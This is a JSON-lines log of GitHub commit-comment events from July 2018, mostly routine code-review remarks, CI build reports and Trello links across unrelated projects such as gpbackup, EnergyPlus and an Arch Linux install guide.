{"id":"7984125340","type":"CommitCommentEvent","actor":{"login":"OliviaZhi"},"repo":{"name":"MLJejuCamp2017/DRL_based_SelfDrivingCarControl"},"payload":{"comment":{"id":29752792,"position":null,"line":null,"path":null,"commit_id":"c81b831bf59675a0607a62d032f76bec8c3648f6","created_at":"2018-07-18T16:34:38Z","updated_at":"2018-07-18T16:34:38Z","author_association":"NONE","body":"I just simply run your notebook file Double_Dueling_image_sensor.ipynb\r\nbut I don't see the 'score' (variable you defined in your code, which is the accumulated reward for each episode) increases with the episode number. (as the file e.g.1.pdf I provided above). It's wired since normally the accumulated reward for each episode should consistently increase with the episode (training time). \r\nDo you have the similar issue when you run your file?\r\nHow do you calculate the reward? like you use **reward = score_board/step** or anything?"}},"created_at":"2018-07-18T16:34:38Z"}
{"id":"7984126086","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29752794,"position":null,"line":null,"path":null,"commit_id":"530f1c8b129d74ce13d3cec2690de0d65876a93c","created_at":"2018-07-18T16:34:47Z","updated_at":"2018-07-18T16:34:47Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Wire up your static React App to our Notes API.](https://trello.com/c/8ZXeYcd6/9-wire-up-your-static-react-app-to-our-notes-api)"}},"created_at":"2018-07-18T16:34:47Z"}
{"id":"7984128722","type":"CommitCommentEvent","actor":{"login":"Morganamilo"},"repo":{"name":"ejmg/an-idiots-guide-to-installing-arch-on-a-lenovo-carbon-x1-gen-6"},"payload":{"comment":{"id":29752800,"position":8,"line":97,"path":"README.org","commit_id":"0286bf48e30c505393b38a5d60eefbccbf75e24d","created_at":"2018-07-18T16:35:16Z","updated_at":"2018-07-18T16:35:16Z","author_association":"NONE","body":"I'm glad you took the criticism honestly. I've given the guide a brush over and there's a couple of other things I have questions over.\r\n\r\n- Nitpick but download the iso not download the img\r\n- Why do you tell users to mess with the mirrorlist manually? reflector is a great tool for this and will actually find the fastest mirrors instead of you just guessing\r\n- pacman -Syu does not refresh the mirror list. The mirror list is just that text file. Mirrors should all be equal. Once you've ran -Sy on one mirror, running it again on a new mirror shouldn't make any difference. Plus you're on the iso so there's no real need to run any pacman commands. pacstrap will call -Syu itself when ran\r\n- Whats with the over complected wifi setup? `wifi-menu` is on the iso\r\n- Comment is wrong when creating the root partition. Also 64G seems a little large, might want to have a scale for people with different sized drives\r\n- Is there a reason you're using -p with genfstab?\r\n- Locale stuff should be done in the chroot, as soon as possible. Some software might misbehave without a locale and I'm sure the people who don't really know English too well would appreciate it\r\n- Same goes for setting the clock, can't really use https otherwise\r\n- root should be given a password before rebooting\r\n- You've completely missed setting the timezone\r\n- It's util-linux not utils-linux. Also it is part of the base group so there's no need to install it manually\r\n- mkinitcpio -P will regenerate all ramdisks, might me simpler to just recommend that"}},"created_at":"2018-07-18T16:35:16Z"}
{"id":"7984130233","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.09"},"payload":{"comment":{"id":29752805,"position":13,"line":15,"path":"Task1/Logic.Task1/Sorter.cs","commit_id":"6a6cfb575cbd8262bc6a4ad1b393a941d6cbf478","created_at":"2018-07-18T16:35:32Z","updated_at":"2018-07-18T16:35:32Z","author_association":"NONE","body":"не уверена, что мы сейчас друг друга понимаем, но пытаюсь донести мысль о том, что у будет только один метод, принимающий компаратор, и этот метод можно использовать для сортировки как по возрастанию, так и по убыванию, настраивая соответствующий компаратор"}},"created_at":"2018-07-18T16:35:32Z"}
{"id":"7984131502","type":"CommitCommentEvent","actor":{"login":"chrishajas"},"repo":{"name":"greenplum-db/gpbackup"},"payload":{"comment":{"id":29752808,"position":15,"line":90,"path":"backup/validate.go","commit_id":"edd9b8cd9bbfbb58071a325c82fcdd51119b2cd3","created_at":"2018-07-18T16:35:47Z","updated_at":"2018-07-18T16:35:47Z","author_association":"MEMBER","body":"In `ValidateFlagValues` (around line 100), we can also validate that the flag is in the correct format with something like \r\n\r\n```\r\n\tif !utils.IsValidTimestamp(MustGetFlagString(TIMESTAMP)) {\r\n\t\tgplog.Fatal(errors.Errorf(\"Timestamp %s is invalid.  Timestamps must be in the format YYYYMMDDHHMMSS.\", MustGetFlagString(TIMESTAMP)), \"\")\r\n\t}\r\n```"}},"created_at":"2018-07-18T16:35:47Z"}
{"id":"7984136061","type":"CommitCommentEvent","actor":{"login":"stek29"},"repo":{"name":"coolstar/electra1131"},"payload":{"comment":{"id":29752816,"position":null,"line":null,"path":null,"commit_id":"0961394b85642e1479d94136b0c5adb5431c278b","created_at":"2018-07-18T16:36:39Z","updated_at":"2018-07-18T16:36:39Z","author_association":"NONE","body":"orly"}},"created_at":"2018-07-18T16:36:39Z"}
{"id":"7984138107","type":"CommitCommentEvent","actor":{"login":"Zhikh"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.09"},"payload":{"comment":{"id":29752825,"position":13,"line":15,"path":"Task1/Logic.Task1/Sorter.cs","commit_id":"6a6cfb575cbd8262bc6a4ad1b393a941d6cbf478","created_at":"2018-07-18T16:37:04Z","updated_at":"2018-07-18T16:37:04Z","author_association":"OWNER","body":"я поняла, спасибо"}},"created_at":"2018-07-18T16:37:04Z"}
{"id":"7984142597","type":"CommitCommentEvent","actor":{"login":"architectUser"},"repo":{"name":"architectUser/ionic"},"payload":{"comment":{"id":29752830,"position":null,"line":null,"path":null,"commit_id":"155c3c7b792b3c9d80f02564b30e7422196f4778","created_at":"2018-07-18T16:37:54Z","updated_at":"2018-07-18T16:37:54Z","author_association":"OWNER","body":"agree"}},"created_at":"2018-07-18T16:37:54Z"}
{"id":"7984143215","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29752833,"position":null,"line":null,"path":null,"commit_id":"66b5dc0e85d0423e84204dbfd3ee945b84286115","created_at":"2018-07-18T16:38:02Z","updated_at":"2018-07-18T16:38:02Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [rsyncupdat](https://rsyncupdat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/b0aec4a3b165fc9008e146250de802494a8ac9ec/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/b0aec4a3b165fc9008e146250de802494a8ac9ec/scripts/deploy-multidev.sh)\n"}},"created_at":"2018-07-18T16:38:02Z"}
{"id":"7984143296","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29752835,"position":null,"line":null,"path":null,"commit_id":"81bbff4676827feeee3d9507ad0495fc4961f4ad","created_at":"2018-07-18T16:38:03Z","updated_at":"2018-07-18T16:38:03Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win32-master Continuous [Build 232](http://build.palaso.org/viewLog.html?buildId=124978&buildTypeId=Liblcm_LiblcmWin32masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:01:27"}},"created_at":"2018-07-18T16:38:03Z"}
{"id":"7984145507","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29752839,"position":null,"line":null,"path":null,"commit_id":"f7466c28a5f2c2acd2669991cb3a666c997aafab","created_at":"2018-07-18T16:38:30Z","updated_at":"2018-07-18T16:38:30Z","author_association":"MEMBER","body":"f93cb448f1d8b8346dff13fffacfd3c9f85edde0"}},"created_at":"2018-07-18T16:38:30Z"}
{"id":"7984155302","type":"CommitCommentEvent","actor":{"login":"Shroompow"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29752861,"position":32,"line":167,"path":"dedshroom/utils/storage.js","commit_id":"7bd09b5b5ea11f1e17eaa208041d105c62a58e02","created_at":"2018-07-18T16:40:28Z","updated_at":"2018-07-18T16:40:28Z","author_association":"OWNER","body":"Relaying a Promise through a Promise is not necessary, you can just return the Promise-Object if no additional action is performed."}},"created_at":"2018-07-18T16:40:28Z"}
{"id":"7984155649","type":"CommitCommentEvent","actor":{"login":"picklechips"},"repo":{"name":"CGUC/grapp-client"},"payload":{"comment":{"id":29752863,"position":7,"line":36,"path":"ApiClient.js","commit_id":"0bc90daf70fdba39b3cf55e262c7812e898c7245","created_at":"2018-07-18T16:40:32Z","updated_at":"2018-07-18T16:40:32Z","author_association":"MEMBER","body":"I think this may have broken logging in\r\n"}},"created_at":"2018-07-18T16:40:32Z"}
{"id":"7984157613","type":"CommitCommentEvent","actor":{"login":"premultiply"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29752871,"position":null,"line":null,"path":null,"commit_id":"a3a727ad7b1a653da5c83a4a2b902cca5349be7a","created_at":"2018-07-18T16:40:55Z","updated_at":"2018-07-18T16:40:55Z","author_association":"NONE","body":"Why `asetnsamples=n=1024:p=0` two times?"}},"created_at":"2018-07-18T16:40:55Z"}
{"id":"7984160043","type":"CommitCommentEvent","actor":{"login":"AshishKingdom"},"repo":{"name":"AshishKingdom/Hunter-Revenge"},"payload":{"comment":{"id":29752877,"position":null,"line":null,"path":null,"commit_id":"4b6abf5fbac1f759650991d8dd4a4216090de47f","created_at":"2018-07-18T16:41:25Z","updated_at":"2018-07-18T16:41:25Z","author_association":"OWNER","body":"I mean, reseting the \"game\" should also reset settings"}},"created_at":"2018-07-18T16:41:25Z"}
{"id":"7984160816","type":"CommitCommentEvent","actor":{"login":"soumyadeep2007"},"repo":{"name":"greenplum-db/gpbackup"},"payload":{"comment":{"id":29752880,"position":15,"line":90,"path":"backup/validate.go","commit_id":"edd9b8cd9bbfbb58071a325c82fcdd51119b2cd3","created_at":"2018-07-18T16:41:35Z","updated_at":"2018-07-18T16:41:35Z","author_association":"CONTRIBUTOR","body":"Cool will add it"}},"created_at":"2018-07-18T16:41:35Z"}
{"id":"7984163917","type":"CommitCommentEvent","actor":{"login":"rpdelaney"},"repo":{"name":"Nelyah/dotfiles"},"payload":{"comment":{"id":29752887,"position":11,"line":8,"path":".config/ranger/colorschemes/my_colourscheme.py","commit_id":"a04002f5de335624720e37130edd18f0a8e0e61c","created_at":"2018-07-18T16:42:12Z","updated_at":"2018-07-18T16:42:12Z","author_association":"NONE","body":"You should probably trap the exception that will be raised when this env var is unset."}},"created_at":"2018-07-18T16:42:12Z"}
{"id":"7984164993","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29752890,"position":null,"line":null,"path":null,"commit_id":"027a42cabba480cab8743f2aa281731dace9a1ea","created_at":"2018-07-18T16:42:25Z","updated_at":"2018-07-18T16:42:25Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - i386-Windows-7-VisualStudio-14: OK (2942 of 2942 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T16:42:25Z"}
{"id":"7984168014","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29752897,"position":null,"line":null,"path":null,"commit_id":"027a42cabba480cab8743f2aa281731dace9a1ea","created_at":"2018-07-18T16:43:02Z","updated_at":"2018-07-18T16:43:02Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - x86_64-MacOS-10.9-clang: OK (2899 of 2942 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 2 tests had: ESO small diffs.\n * 42 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * Failed: 1\n\nregression Test Summary\n * Passed: 581\n * Failed: 42\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.54%25-yellow.png)</a> \n"}},"created_at":"2018-07-18T16:43:02Z"}
{"id":"7984168251","type":"CommitCommentEvent","actor":{"login":"chrishajas"},"repo":{"name":"greenplum-db/gpbackup"},"payload":{"comment":{"id":29752901,"position":11,"line":29,"path":"backup/incremental.go","commit_id":"edd9b8cd9bbfbb58071a325c82fcdd51119b2cd3","created_at":"2018-07-18T16:43:05Z","updated_at":"2018-07-18T16:43:05Z","author_association":"MEMBER","body":"Can we just return the result from `MustGetFlagString(FROM_TIMESTAMP)`?"}},"created_at":"2018-07-18T16:43:05Z"}
{"id":"7984172247","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29752915,"position":null,"line":null,"path":null,"commit_id":"68a3b0942715c70b6957c236feb853f855ce6306","created_at":"2018-07-18T16:43:53Z","updated_at":"2018-07-18T16:43:53Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T16:43:53Z"}
{"id":"7984172346","type":"CommitCommentEvent","actor":{"login":"chrishajas"},"repo":{"name":"greenplum-db/gpbackup"},"payload":{"comment":{"id":29752916,"position":10,"line":33,"path":"backup/backup.go","commit_id":"edd9b8cd9bbfbb58071a325c82fcdd51119b2cd3","created_at":"2018-07-18T16:43:54Z","updated_at":"2018-07-18T16:43:54Z","author_association":"MEMBER","body":"Let's modify this to `...for ao tables that...`"}},"created_at":"2018-07-18T16:43:54Z"}
{"id":"7984173773","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29752920,"position":null,"line":null,"path":null,"commit_id":"5c101e29350994446fac35d2b41ef5a2b2d9be3d","created_at":"2018-07-18T16:44:11Z","updated_at":"2018-07-18T16:44:11Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T16:44:11Z"}
{"id":"7984175179","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29752922,"position":null,"line":null,"path":null,"commit_id":"63b51a2b0f3cee81cdbb97e936fec25eee150383","created_at":"2018-07-18T16:44:28Z","updated_at":"2018-07-18T16:44:28Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T16:44:28Z"}
{"id":"7984176069","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29752927,"position":null,"line":null,"path":null,"commit_id":"14ff150f6b5399a9c1bdfda6bd128a21e0574b3c","created_at":"2018-07-18T16:44:38Z","updated_at":"2018-07-18T16:44:38Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T16:44:38Z"}
{"id":"7984178007","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29752932,"position":null,"line":null,"path":null,"commit_id":"463887c58cb3895aa4eb7858531ddf29f9991214","created_at":"2018-07-18T16:45:02Z","updated_at":"2018-07-18T16:45:02Z","author_association":"MEMBER","body":"@Rohanator9000  Yeah, that should would work\r\n"}},"created_at":"2018-07-18T16:45:02Z"}
{"id":"7984180567","type":"CommitCommentEvent","actor":{"login":"ejmg"},"repo":{"name":"ejmg/an-idiots-guide-to-installing-arch-on-a-lenovo-carbon-x1-gen-6"},"payload":{"comment":{"id":29752938,"position":8,"line":97,"path":"README.org","commit_id":"0286bf48e30c505393b38a5d60eefbccbf75e24d","created_at":"2018-07-18T16:45:32Z","updated_at":"2018-07-18T16:45:32Z","author_association":"OWNER","body":"Can you post this in an issue as \"improvements\" or \"recommendations\" or whatever you'd like, and I would love to integrate them into the guide. Keeping them here makes it kind of a pain to track, however."}},"created_at":"2018-07-18T16:45:32Z"}
{"id":"7984186279","type":"CommitCommentEvent","actor":{"login":"IAMOHW"},"repo":{"name":"HOUSEOFVURLC/acms"},"payload":{"comment":{"id":29752953,"position":null,"line":null,"path":null,"commit_id":"7e74ee6bfda41bf1b99658bf93de7c76173739c7","created_at":"2018-07-18T16:46:41Z","updated_at":"2018-07-18T16:46:41Z","author_association":"MEMBER","body":"马上要去旅游。最近不更新。8.5号回来更新"}},"created_at":"2018-07-18T16:46:41Z"}
{"id":"7984187054","type":"CommitCommentEvent","actor":{"login":"soumyadeep2007"},"repo":{"name":"greenplum-db/gpbackup"},"payload":{"comment":{"id":29752957,"position":10,"line":33,"path":"backup/backup.go","commit_id":"edd9b8cd9bbfbb58071a325c82fcdd51119b2cd3","created_at":"2018-07-18T16:46:50Z","updated_at":"2018-07-18T16:46:50Z","author_association":"CONTRIBUTOR","body":"I agree, will do"}},"created_at":"2018-07-18T16:46:50Z"}
{"id":"7984188409","type":"CommitCommentEvent","actor":{"login":"ejmg"},"repo":{"name":"ejmg/an-idiots-guide-to-installing-arch-on-a-lenovo-carbon-x1-gen-6"},"payload":{"comment":{"id":29752958,"position":8,"line":97,"path":"README.org","commit_id":"0286bf48e30c505393b38a5d60eefbccbf75e24d","created_at":"2018-07-18T16:47:07Z","updated_at":"2018-07-18T16:47:07Z","author_association":"OWNER","body":"The chronology of doing the locale/time stuff is definitely a big goof on my part, and it probably explains why my time stamps in chromium are off by about two hours 😝, I'll say that much here lol"}},"created_at":"2018-07-18T16:47:07Z"}
{"id":"7984189955","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29752961,"position":null,"line":null,"path":null,"commit_id":"8a156b33dadd1713d1d0018ae5c35be8188ff7e8","created_at":"2018-07-18T16:47:25Z","updated_at":"2018-07-18T16:47:25Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [rsyncupdat](https://rsyncupdat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/b0aec4a3b165fc9008e146250de802494a8ac9ec/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/b0aec4a3b165fc9008e146250de802494a8ac9ec/scripts/deploy-multidev.sh)\n- [/docs/cache-control](https://rsyncupdat-static-docs.pantheonsite.io/docs/cache-control)\n- [/docs/caching-advanced-topics](https://rsyncupdat-static-docs.pantheonsite.io/docs/caching-advanced-topics)\n"}},"created_at":"2018-07-18T16:47:25Z"}
{"id":"7984204416","type":"CommitCommentEvent","actor":{"login":"zaksoup"},"repo":{"name":"codeforamerica/clientcomm-rails"},"payload":{"comment":{"id":29752980,"position":4,"line":4,"path":"app/channels/events_channel.rb","commit_id":"ccb04ed4f6886bb3cb7b8b394cab72a0b0775fa7","created_at":"2018-07-18T16:50:17Z","updated_at":"2018-07-18T16:50:17Z","author_association":"COLLABORATOR","body":"because this streams from `current_user.id` there's no way that a client could specify a different user from which to stream events - per convo between @zaksoup and @glassresistor "}},"created_at":"2018-07-18T16:50:17Z"}
{"id":"7984205691","type":"CommitCommentEvent","actor":{"login":"rpdelaney"},"repo":{"name":"Nelyah/dotfiles"},"payload":{"comment":{"id":29752984,"position":11,"line":8,"path":".config/ranger/colorschemes/my_colourscheme.py","commit_id":"a04002f5de335624720e37130edd18f0a8e0e61c","created_at":"2018-07-18T16:50:32Z","updated_at":"2018-07-18T16:50:32Z","author_association":"NONE","body":"Also adding a test to verify that no exceptions are raised when `LS_COLORS` is not set in the environment might be a good idea."}},"created_at":"2018-07-18T16:50:32Z"}
{"id":"7984206857","type":"CommitCommentEvent","actor":{"login":"valenaUsi"},"repo":{"name":"valenaUsi/pulpissimo"},"payload":{"comment":{"id":29752987,"position":null,"line":null,"path":null,"commit_id":"1aea9524f7575f4f343d6b902964cf6c7797458e","created_at":"2018-07-18T16:50:45Z","updated_at":"2018-07-18T16:50:45Z","author_association":"OWNER","body":"Chance color"}},"created_at":"2018-07-18T16:50:45Z"}
{"id":"7984206989","type":"CommitCommentEvent","actor":{"login":"mcwumbly"},"repo":{"name":"pivotal-cf/om"},"payload":{"comment":{"id":29752988,"position":null,"line":null,"path":null,"commit_id":"45157b9b011d7caf94d138cd936c87e10e812038","created_at":"2018-07-18T16:50:46Z","updated_at":"2018-07-18T16:50:46Z","author_association":"CONTRIBUTOR","body":"@rizwanreza - in the past, I've seen some comments like the one on this issue: https://github.com/pivotal-cf/om/pull/197#issuecomment-402537295\r\n\r\nThat was my motivation for including the note about unit tests -- recognizing that we may choose consistency over redundancy sometimes.\r\n\r\nNot pushing for anything in particular here -- but something to keep in mind.\r\n\r\nIt may be good to clarify these kinds of arbitrary, stylistic concerns as we go forward just to reduce the friction around them when contributors inevitably disagree with certain choices.\r\n\r\n/cc @pivotal-cf/pcf-release-engineering @pivotal-cf/pcf-platform-automation \r\n\r\n"}},"created_at":"2018-07-18T16:50:46Z"}
{"id":"7984207307","type":"CommitCommentEvent","actor":{"login":"zaksoup"},"repo":{"name":"codeforamerica/clientcomm-rails"},"payload":{"comment":{"id":29752989,"position":4,"line":4,"path":"app/channels/notifications_channel.rb","commit_id":"ccb04ed4f6886bb3cb7b8b394cab72a0b0775fa7","created_at":"2018-07-18T16:50:50Z","updated_at":"2018-07-18T16:50:50Z","author_association":"COLLABORATOR","body":"we can/should just change this to stream from `current_user.id` instead of `params` to force clients always to stream the authenticated user's notifications. per convo between @zaksoup and @glassresistor "}},"created_at":"2018-07-18T16:50:50Z"}
{"id":"7984208257","type":"CommitCommentEvent","actor":{"login":"tkrasnukha"},"repo":{"name":"llvm-mirror/lldb"},"payload":{"comment":{"id":29752991,"position":null,"line":null,"path":null,"commit_id":"49509d6b4c8b15be00d85f84aceef27914921633","created_at":"2018-07-18T16:51:02Z","updated_at":"2018-07-18T16:51:02Z","author_association":"CONTRIBUTOR","body":"To @banzr : build was fixed with b16e8c12330ba21fb45b7d8b1e6ee3f8510b2846"}},"created_at":"2018-07-18T16:51:02Z"}
{"id":"7984214043","type":"CommitCommentEvent","actor":{"login":"theMultitude"},"repo":{"name":"DirupT/front-end-project-week"},"payload":{"comment":{"id":29752996,"position":null,"line":null,"path":null,"commit_id":"b2b0ad247fa10c77d37a4d2e4dc68e8094d5ee14","created_at":"2018-07-18T16:52:12Z","updated_at":"2018-07-18T16:52:12Z","author_association":"NONE","body":"Comments look good, concise and informative!"}},"created_at":"2018-07-18T16:52:12Z"}
{"id":"7984215142","type":"CommitCommentEvent","actor":{"login":"randyv12"},"repo":{"name":"Spokeo/api_authenticator"},"payload":{"comment":{"id":29752999,"position":null,"line":null,"path":null,"commit_id":"c304ca10d029893af74fb1b97d47b2334edb4f3c","created_at":"2018-07-18T16:52:25Z","updated_at":"2018-07-18T16:52:25Z","author_association":"NONE","body":"its austin!! dude! whats up! we miss u lol :D"}},"created_at":"2018-07-18T16:52:25Z"}
{"id":"7984219002","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29753005,"position":457,"line":457,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T16:53:09Z","updated_at":"2018-07-18T16:53:09Z","author_association":"NONE","body":"> Ok so this is a long explanation which starts with this email I sent to the freebsd-hackers@ mailing list. Read the entire conversation if you can.\r\n> \r\n> As a summary of what I wrote there, the segs array would get over-written when another load on the same tag is called. The concern I raised there was that this is a bug. Hans Petter Selasky told me that this is expected behavior and that it is the client's responsibility to serialize the loads.\r\n> \r\n> So if a load is deferred, after the shortage is over, busdma_bounce fills up the segs array again\r\n\r\nWhat do you mean by 'again'. The segs array should be filled only once by the parent tag?\r\n\r\n> before calling the client's callback. The scope of the segs array is limited to the callback. After that, it can be over-written. That is the reason tag_create requires lockfunc. This lockfunc is called to acquire the lock provided by the client driver to ensure serial access so that no load is called while another load is in its callback.\r\n> \r\n> But we will not be calling load again when the wait for grant refs is over. That load has already finished. So the refs array won't be filled again. Simply doing temp_segs = segs means we save an address to busdma_bounce's tag->segments array (busdma_bounce.c:76, busdma_bounce.c:914 for reference) which will be over-written as soon as another load is called. And another map can be loaded while this map waits for the grant refs.\r\n\r\nHm, no, I don't think so. Another load will allocate a new segs array, and the previous one will be left in temp_segs.\r\n\r\nAlso, if the client is not supposed to try to issue concurrent loads using the same tag, why are we doing all this? Isn't it enough to just store whatever segs array the parent tag returns and keep that until the load is finished?\r\n\r\nThe client issuing another load while this is still being processed is not supported as you say above."}},"created_at":"2018-07-18T16:53:09Z"}
{"id":"7984225521","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"deeptools/HiCExplorer"},"payload":{"comment":{"id":29753021,"position":5,"line":9,"path":"hicexplorer/test/long_run/test_buildMatrix.py","commit_id":"808fd415965fcfddc7cb307f3e82c4923a30b68f","created_at":"2018-07-18T16:54:24Z","updated_at":"2018-07-18T16:54:24Z","author_association":"MEMBER","body":"keep in mind to use os.path.join() whenever you can."}},"created_at":"2018-07-18T16:54:24Z"}
{"id":"7984225944","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29753022,"position":26,"line":26,"path":"gui/config/CCalibFromPlanesConfig.h","commit_id":"36e25cc00070660c90d1f6cc49709bbd05165264","created_at":"2018-07-18T16:54:29Z","updated_at":"2018-07-18T16:54:29Z","author_association":"OWNER","body":"Meant to be a callback function for the \"proceed calibration\" button. In the calibration from planes case, \"start calibration\" would start the planes segmentation. Then \"proceed calibration\" would trigger the matching, and so on.."}},"created_at":"2018-07-18T16:54:29Z"}
{"id":"7984226758","type":"CommitCommentEvent","actor":{"login":"sinkingsugar"},"repo":{"name":"yglukhov/nimpy"},"payload":{"comment":{"id":29753023,"position":null,"line":null,"path":null,"commit_id":"24d9e43bda62d45d46b50a18a58b7dcdb4dace13","created_at":"2018-07-18T16:54:39Z","updated_at":"2018-07-18T16:54:39Z","author_association":"NONE","body":"This makes everything crash with this message:\r\n```\r\nFatal Python error: no mem for sys.argv\r\nValueError: character U+65764f00 is not in range [U+0000; U+10ffff]\r\n\r\nCurrent thread 0x00007f9a4c062bc0 (most recent call first):\r\nSIGABRT: Abnormal termination.\r\n```\r\nwhen `-d:release` is in the nim command line for me"}},"created_at":"2018-07-18T16:54:39Z"}
{"id":"7984229309","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29753027,"position":67,"line":606,"path":"xwiki-platform-core/xwiki-platform-test/xwiki-platform-test-ui/src/main/java/org/xwiki/test/ui/XWikiWebDriver.java","commit_id":"4212e52f380b4d9d1ecf8c30eced5a5ab52210ea","created_at":"2018-07-18T16:55:07Z","updated_at":"2018-07-18T16:55:07Z","author_association":"MEMBER","body":"This is weird. I don't understand how we could have released XWiki 10.6RC1 with failing tests. This is a very big change affecting almost every test we have. So maybe there's something specific with your computer. Any idea? Anything you may have changed locally?\r\n\r\nNow till we figure out the problem, you could simply revert this change locally (ie put back the \"return this.wrappedDriver.findElement(by);\" part), at least so that you can run functional tests locally and not be blocked.\r\n\r\nFTR this change wasn't related to the JIRA issue but a problem I found when running some tests on a smallish screen (ie when running the MenuTest inside the Docker container which is using a resolution smaller than what we have by default with our selenium 2.x tests)."}},"created_at":"2018-07-18T16:55:07Z"}
{"id":"7984230144","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29753028,"position":308,"line":308,"path":"lib/node_modules/@stdlib/stats/incr/apcorr/test/test.js","commit_id":"80f96253bf726f33bc71d8eb68037ab203ae4cf9","created_at":"2018-07-18T16:55:15Z","updated_at":"2018-07-18T16:55:15Z","author_association":"MEMBER","body":"Done."}},"created_at":"2018-07-18T16:55:15Z"}
{"id":"7984230527","type":"CommitCommentEvent","actor":{"login":"ronag"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29753029,"position":null,"line":null,"path":null,"commit_id":"a3a727ad7b1a653da5c83a4a2b902cca5349be7a","created_at":"2018-07-18T16:55:20Z","updated_at":"2018-07-18T16:55:20Z","author_association":"MEMBER","body":"Otherwise I bugs out. Don’t ask me why..."}},"created_at":"2018-07-18T16:55:20Z"}
